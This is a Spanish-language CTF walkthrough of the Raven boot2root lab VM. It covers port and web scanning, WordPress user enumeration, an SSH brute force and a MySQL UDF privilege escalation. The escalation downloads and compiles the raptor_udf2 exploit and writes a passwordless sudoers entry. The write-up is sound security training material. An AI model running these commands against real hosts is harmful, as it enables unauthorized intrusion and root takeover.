raven - danielcastropalomares/security GitHub Wiki
Con un primer escaneo vemos lo siguiente:
root@kali:~# nmap -p- 172.31.255.119
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-20 20:46 CET
Nmap scan report for 172.31.255.119
Host is up (0.000097s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
51658/tcp open unknown
MAC Address: 08:00:27:A7:A0:45 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.07 seconds
root@kali:~# nmap -A 172.31.255.119
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-20 20:46 CET
Nmap scan report for 172.31.255.119
Host is up (0.00079s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 51658/tcp status
|_ 100024 1 54118/udp status
MAC Address: 08:00:27:A7:A0:45 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.79 ms 172.31.255.119
Con rpcinfo nos muestra la misma información que con nmap:
root@kali:~# rpcinfo -s 172.31.255.119
program version(s) netid(s) service owner
100000 2,3,4 local,udp,tcp,udp6,tcp6 portmapper superuser
100024 1 tcp6,udp6,tcp,udp status 106
Listamos los directorios web:
[*] Execute: /usr/local/src/Osmedeus/plugins/dirsearch/dirsearch.py --plain-text-report=/usr/local/src/Osmedeus/workspaces/172.31.255.119/directory/172.31.255.119-dirsearch.txt -u "http://172.31.255.119" -e php,asp,aspx,jsp,js -t 20
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js | Threads: 20 | Wordlist size: 7489
Error Log: /usr/local/src/Osmedeus/plugins/dirsearch/logs/errors-18-12-20_21-19-51.log
Target: http://172.31.255.119
[21:19:51] Starting:
[21:19:51] 301 - 313B - /js -> http://172.31.255.119/js/
[21:19:51] 200 - 18KB - /.DS_Store
[21:19:51] 403 - 300B - /.ht_wsr.txt
[21:19:51] 403 - 304B - /.htaccess-local
[21:19:51] 403 - 293B - /.hta
[21:19:51] 403 - 302B - /.htaccess-dev
[21:19:51] 403 - 305B - /.htaccess.sample
[21:19:51] 403 - 303B - /.htaccess.bak1
[21:19:51] 403 - 304B - /.htaccess-marco
[21:19:51] 403 - 302B - /.htaccess.old
[21:19:51] 403 - 303B - /.htaccess.orig
[21:19:51] 403 - 302B - /.htaccess.BAK
[21:19:51] 403 - 302B - /.htaccess.txt
[21:19:51] 403 - 303B - /.htaccess_orig
[21:19:51] 403 - 297B - /.htgroup
[21:19:51] 403 - 299B - /.htaccess~
[21:19:51] 403 - 303B - /.htaccess.save
[21:19:51] 403 - 302B - /.htaccessOLD2
[21:19:51] 403 - 304B - /.htaccess_extra
[21:19:51] 403 - 301B - /.htaccessBAK
[21:19:51] 403 - 301B - /.htaccessOLD
[21:19:51] 403 - 301B - /.htaccess_sc
[21:19:51] 403 - 302B - /.htpasswd-old
[21:19:51] 403 - 299B - /.htpasswds
[21:19:51] 403 - 297B - /.htusers
[21:19:51] 403 - 303B - /.htpasswd_test
[21:19:57] 301 - 314B - /css -> http://172.31.255.119/css/
[21:19:58] 301 - 316B - /fonts -> http://172.31.255.119/fonts/
[21:19:59] 301 - 314B - /img -> http://172.31.255.119/img/
[21:19:59] 200 - 16KB - /index.html
[21:20:00] 301 - 317B - /manual -> http://172.31.255.119/manual/
[21:20:00] 200 - 626B - /manual/index.html
[21:20:02] 403 - 303B - /server-status/
[21:20:02] 403 - 302B - /server-status
Si escaneamos con nikto:
root@kali:~# nikto --host 172.31.255.119
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.119
+ Target Hostname: 172.31.255.119
+ Target Port: 80
+ Start Time: 2018-12-23 18:14:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x41b3 0x5734482bdcb00
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2018-12-23 18:14:21 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Con wpscan escaneamos las vulnerabilidades de wordpress:
root@kali:/usr/local/src/Osmedeus# wpscan --wp-content-dir wordpress --url http://172.31.255.119/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.4.0
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://172.31.255.119/wordpress/
[+] Started: Thu Dec 20 21:40:28 2018
Interesting Finding(s):
[+] http://172.31.255.119/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://172.31.255.119/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://172.31.255.119/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.8 identified (Latest, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://172.31.255.119/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://172.31.255.119/wordpress/, Match: 'WordPress 4.8.8'
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <============================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Thu Dec 20 21:40:29 2018
[+] Requests Done: 22
[+] Cached Requests: 22
[+] Data Sent: 4.466 KB
[+] Data Received: 10.005 KB
[+] Memory used: 53.574 MB
[+] Elapsed time: 00:00:01
Vamos a centrarnos en el archivo json que ha detectado nikto, si clickamos en el enlace "https://api.w.org/, nos llega a la documentación oficial de wordpress. Asi que confirmamos que la REST API de wordpress se encuentra habilitada:
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
El código que encontramos en la URL "http://raven.local/wordpress/index.php/wp-json/", está ofuscado, para ellos nos vamos a ayudar con la herramienta online beatufier.io:
https://beautifier.io/
http://raven.local/wordpress/index.php/wp-json/
Guardamos el resultado en un fichero .txt y filtramos por las URLS:
$ grep self Documents/raven-json.txt
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/oembed\/1.0"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/oembed\/1.0\/embed"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/oembed\/1.0\/proxy"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/pages"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/media"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/types"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/statuses"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/taxonomies"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/categories"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/tags"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/users"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/me"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/comments"
"self": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/settings"
Vamos a listar todos los usuarios creados a nivel de wordpress:
root@kali:/tmp# curl -I http://raven.local/wordpress/index.php/wp-json/wp/v2/users
HTTP/1.1 200 OK
Date: Fri, 21 Dec 2018 02:10:29 GMT
Server: Apache/2.4.10 (Debian)
X-Robots-Tag: noindex
Link: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
X-WP-Total: 1
X-WP-TotalPages: 1
Allow: GET
Content-Type: application/json; charset=UTF-8
Como no estamos auntenticados, solo nos permites hacer un GET:
curl http://raven.local/wordpress/index.php/wp-json/wp/v2/users
[{
"id": 1,
"name": "michael",
"url": "",
"description": "",
"link": "http:\/\/raven.local\/wordpress\/index.php\/author\/michael\/",
"slug": "michael",
"avatar_urls": {
"24": "http:\/\/0.gravatar.com\/avatar\/604e47508b7ee36deeef09f80e394efa?s=24&d=mm&r=g",
"48": "http:\/\/0.gravatar.com\/avatar\/604e47508b7ee36deeef09f80e394efa?s=48&d=mm&r=g",
"96": "http:\/\/0.gravatar.com\/avatar\/604e47508b7ee36deeef09f80e394efa?s=96&d=mm&r=g"
},
"meta": [],
"_links": {
"self": [{
"href": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"
}],
"collection": [{
"href": "http:\/\/raven.local\/wordpress\/index.php\/wp-json\/wp\/v2\/users"
}]
}
}]
Como no estoy autenticado, al intentar crear un usuario da error:
root@kali:/tmp# curl -i -X POST -H "Content-Type:application/json" http://raven.local/wordpress/index.php/wp-json/wp/v2/users -d '{"username":"kali","email":"[email protected]","password":"123456789!Abcd"}'
HTTP/1.1 401 Unauthorized
Date: Fri, 21 Dec 2018 02:15:51 GMT
Server: Apache/2.4.10 (Debian)
X-Robots-Tag: noindex
Link: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Content-Length: 116
Content-Type: application/json; charset=UTF-8
{"code":"rest_cannot_create_user","message":"Sorry, you are not allowed to create new users.","data":{"status":401}}root@kali:/tmp#
Hemos encontrado el usuario michael creado a nivel de wordpress, vamos a probar si se encuentra creado a nivel de sistema:
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.119
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME michael
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.119:22 - SSH - Using malformed packet technique
[*] 172.31.255.119:22 - SSH - Starting scan
[+] 172.31.255.119:22 - SSH - User 'michael' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Efectivamente también se encuentra creado a nivel de sistema. Realizamos un ataque de fuerza bruta con nmap para intentar de acceder con el usuario michael por SSH:
root@kali:/tmp# nmap -p 22 --script ssh-brute --script-args userdb=/tmp/user.txt,passdb=/tmp/rockyou.txt,ssh-brute.timeout=4s 172.31.255.119
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-23 21:07 CET
NSE: [ssh-brute] Trying username/password pair: michael:michael
PORT STATE SERVICE
22/tcp open ssh
| ssh-brute:
| Accounts:
| michael:michael - Valid credentials
|_ Statistics: Performed 5 guesses in 460 seconds, average tps: 0.0
MAC Address: 08:00:27:A7:A0:45 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 548.27 seconds
Accedemos con las credenciales michael:michael:
root@kali:/tmp# ssh [email protected]
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$
Encontramos en el directorio web /var/www la flag número 2:
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Comprobamos si tiene permisos de sudo:
michael@Raven:/etc/cron.d$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for michael:
Sorry, user michael may not run sudo on raven.
En el cron no vemos nada interesante:
michael@Raven:/etc/cron.d$ ls -liath /etc/cron.hourly/
total 12K
130561 drwxr-xr-x 89 root root 4.0K Dec 21 15:16 ..
130881 drwxr-xr-x 2 root root 4.0K Aug 13 07:38 .
130882 -rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
michael@Raven:/etc/cron.d$ ls -liath /etc/cron.d
total 20K
130561 drwxr-xr-x 89 root root 4.0K Dec 21 15:16 ..
132523 -rw-r--r-- 1 root root 2.3K Aug 13 07:54 sendmail
130874 drwxr-xr-x 2 root root 4.0K Aug 13 07:54 .
130742 -rw-r--r-- 1 root root 661 Jun 27 03:47 php5
130875 -rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
michael@Raven:/etc/cron.d$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Listamos los archivos con permisos SUID pero tampoco vemos nada fuera de lo común:
michael@Raven:/etc/cron.d$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs
Buscamos los procesos ejecutados como root y encontramos mysql:
michael@Raven:/etc/cron.d$ ps aux | grep root
root 915 0.1 2.6 908488 13304 ? Sl 07:45 0:38 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
Dentro del fichero wp-config.php encontramos las credenciales de root para acceder a la BDD:
/var/www/html/wordpress/wp-config.php
/** MySQL database username */^M
define('DB_USER', 'root');^M
^M
/** MySQL database password */^M
define('DB_PASSWORD', 'R@v3nSecurity');^M
Introducimos las credenciales y ya estamos dentro:
michael@Raven:/var/www/html/wordpress$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35293
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Ahora descargamos el exploit y lo compilamos:
mkdir /tmp/raptor/
cd /tmp/raptor/
wget https://www.exploit-db.com/raw/1518
mv 1518 raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Dentro del mysql volcaremos el exploit que hemos descargado anteriormente:
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf22.so';
mysql> create function do_system returns integer soname 'raptor_udf22.so';
mysql> select * from mysql.func;
+-----------+-----+-----------------+----------+
| name | ret | dl | type |
+-----------+-----+-----------------+----------+
| do_system | 2 | raptor_udf22.so | function |
+-----------+-----+-----------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('id > /tmp/out; chown michael.michael /tmp/out');
En este último comando cambiamos los permisos del fichero para que el usuario michael pueda leer el fichero:
michael@Raven:~$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)
El exploit funciona, el siguiente paso es que el usuario michael pueda ejecutar sudo sin password:
mysql> select do_system('echo "michael ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/michael');
+------------------------------------------------------------------------------+
| do_system('echo "michael ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/michael') |
+------------------------------------------------------------------------------+
| 0 |
+------------------------------------------------------------------------------+
1 row in set (0.01 sec)
Volvemos a conectarnos por ssh con el usuario michael y probamos a escalar con sudo:
michael@Raven:~$ sudo su
root@Raven:/home/michael# cd /root
root@Raven:~# ls
flag4.txt
root@Raven:~# ls -liath
total 40K
660496 -rw------- 1 root michael 3.4K Aug 13 17:30 .bash_history
660688 -rw-r--r-- 1 root michael 66 Aug 13 14:31 .selected_editor
652916 drwx------ 2 root michael 4.0K Aug 13 14:31 .
660686 -rw-r--r-- 1 root michael 20 Aug 13 13:51 .tmux-session
660431 -rw-r--r-- 1 root michael 442 Aug 13 12:22 flag4.txt
660590 -rw------- 1 root michael 27 Aug 13 08:48 .mysql_history
660421 -rw------- 1 root michael 1.0K Aug 13 07:54 .rnd
2 drwxr-xr-x 22 root root 4.0K Aug 13 07:38 ..
653401 -rw-r--r-- 1 root michael 570 Jan 31 2010 .bashrc
653400 -rw-r--r-- 1 root michael 140 Nov 20 2007 .profile
Ya podemos ver el contenido de la ultima bandera:
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io